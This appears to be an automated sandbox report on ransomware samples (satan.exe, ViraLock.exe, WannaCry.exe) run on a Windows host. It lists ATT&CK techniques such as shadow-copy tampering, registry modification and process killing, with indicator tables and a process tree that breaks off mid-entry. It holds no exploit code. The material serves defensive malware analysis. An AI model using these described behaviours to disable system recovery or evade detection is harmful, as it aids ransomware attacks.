System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ViraLock.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ViraLock.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ViraLock.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ViraLock.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ViraLock.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ViraLock.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
2004	vssadmin.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
3440	Process not Found
4084	Process not Found
768	Process not Found
5172	Process not Found

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2842058299-443432012-2465494467-1000\{C2BFBA81-828E-4539-81A9-9EBCBAC809F0}	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE

Modifies registry key 1 TTPs 64 IoCs

Modify Registry

T1112

pid	Process
5640	reg.exe
2840	reg.exe
4084	reg.exe
6008	reg.exe
5936	reg.exe
1592	reg.exe
5648	reg.exe
3568	reg.exe
5832	Process not Found
4564	reg.exe
3404	reg.exe
5508	Process not Found
5784	Process not Found
5744	Process not Found
5404	Process not Found
3860	reg.exe
2264	reg.exe
4548	Process not Found
5472	Process not Found
4104	Process not Found
796	reg.exe
5244	reg.exe
5144	reg.exe
3652	Process not Found
5676	Process not Found
5316	Process not Found
5580	Process not Found
6112	Process not Found
132	reg.exe
1188	reg.exe
3860	Process not Found
6140	Process not Found
3108	Process not Found
3532	reg.exe
2264	reg.exe
5976	reg.exe
4800	reg.exe
5340	reg.exe
1924	reg.exe
5852	reg.exe
5240	Process not Found
5908	Process not Found
768	Process not Found
1900	reg.exe
5004	reg.exe
3944	reg.exe
1444	reg.exe
5256	reg.exe
2264	reg.exe
3448	reg.exe
292	reg.exe
1812	reg.exe
1972	reg.exe
5324	reg.exe
5172	Process not Found
4952	Process not Found
4548	reg.exe
3188	reg.exe
632	reg.exe
5552	reg.exe
5832	Process not Found
6104	Process not Found
5464	Process not Found
5464	Process not Found

NTFS ADS 6 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 812361.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\satan.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 863388.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\ViraLock.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 212685.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\WannaCry.exe:Zone.Identifier	Process not Found

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1608	msedge.exe
1608	msedge.exe
4164	msedge.exe
4164	msedge.exe
1192	msedge.exe
1192	msedge.exe
1956	msedge.exe
1956	msedge.exe
572	msedge.exe
572	msedge.exe
4608	identity_helper.exe
4608	identity_helper.exe
4492	msedge.exe
4492	msedge.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe
4012	satan.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1240	oqUgQMUM.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs

pid	Process
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
1004	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeBackupPrivilege	884	vssvc.exe
Token: SeRestorePrivilege	884	vssvc.exe
Token: SeAuditPrivilege	884	vssvc.exe
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
5988	Process not Found
5988	Process not Found
5588	Process not Found
5588	Process not Found
3440	Process not Found
3440	Process not Found
3008	Process not Found
3008	Process not Found

Suspicious use of UnmapMainImage 2 IoCs

pid	Process
3396	Explorer.EXE
3996	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4164 wrote to memory of 3540	4164	msedge.exe	88
PID 4164 wrote to memory of 3540	4164	msedge.exe	88
PID 1760 wrote to memory of 2784	1760	msedge.exe	89
PID 1760 wrote to memory of 2784	1760	msedge.exe	89
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 244	4164	msedge.exe	90
PID 4164 wrote to memory of 1608	4164	msedge.exe	91
PID 4164 wrote to memory of 1608	4164	msedge.exe	91
PID 1760 wrote to memory of 480	1760	msedge.exe	92
PID 1760 wrote to memory of 480	1760	msedge.exe	92
PID 1760 wrote to memory of 480	1760	msedge.exe	92
PID 1760 wrote to memory of 480	1760	msedge.exe	92
PID 1760 wrote to memory of 480	1760	msedge.exe	92
PID 1760 wrote to memory of 480	1760	msedge.exe	92
PID 1760 wrote to memory of 480	1760	msedge.exe	92
PID 1760 wrote to memory of 480	1760	msedge.exe	92
PID 1760 wrote to memory of 480	1760	msedge.exe	92
PID 1760 wrote to memory of 480	1760	msedge.exe	92
PID 1760 wrote to memory of 480	1760	msedge.exe	92
PID 1760 wrote to memory of 480	1760	msedge.exe	92
PID 1760 wrote to memory of 480	1760	msedge.exe	92
PID 1760 wrote to memory of 480	1760	msedge.exe	92
PID 1760 wrote to memory of 480	1760	msedge.exe	92
PID 1760 wrote to memory of 480	1760	msedge.exe	92
PID 1760 wrote to memory of 480	1760	msedge.exe	92
PID 1760 wrote to memory of 480	1760	msedge.exe	92

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2732

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3396
- C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\rocket-league-spotify-artwork.png
  2⤵
  PID:2340
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1760
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb48113cb8,0x7ffb48113cc8,0x7ffb48113cd8
    3⤵
    PID:2784
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,865723046181491299,12526982389423866189,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1960 /prefetch:2
    3⤵
    PID:480
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1956,865723046181491299,12526982389423866189,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1192
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
  2⤵
  - Enumerates system info in registry
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:4164
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb48113cb8,0x7ffb48113cc8,0x7ffb48113cd8
    3⤵
    PID:3540
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,10300507110523771928,10431451577263293318,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1920 /prefetch:2
    3⤵
    PID:244
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,10300507110523771928,10431451577263293318,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1608
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,10300507110523771928,10431451577263293318,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2616 /prefetch:8
    3⤵
    PID:1084
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,10300507110523771928,10431451577263293318,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1
    3⤵
    PID:4932
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,10300507110523771928,10431451577263293318,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
    3⤵
    PID:400
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,10300507110523771928,10431451577263293318,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4132 /prefetch:1
    3⤵
    PID:4108
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,10300507110523771928,10431451577263293318,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4160 /prefetch:1
    3⤵
    PID:2916
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,10300507110523771928,10431451577263293318,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4124 /prefetch:1
    3⤵
    PID:1552
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,10300507110523771928,10431451577263293318,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3996 /prefetch:1
    3⤵
    PID:4804
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
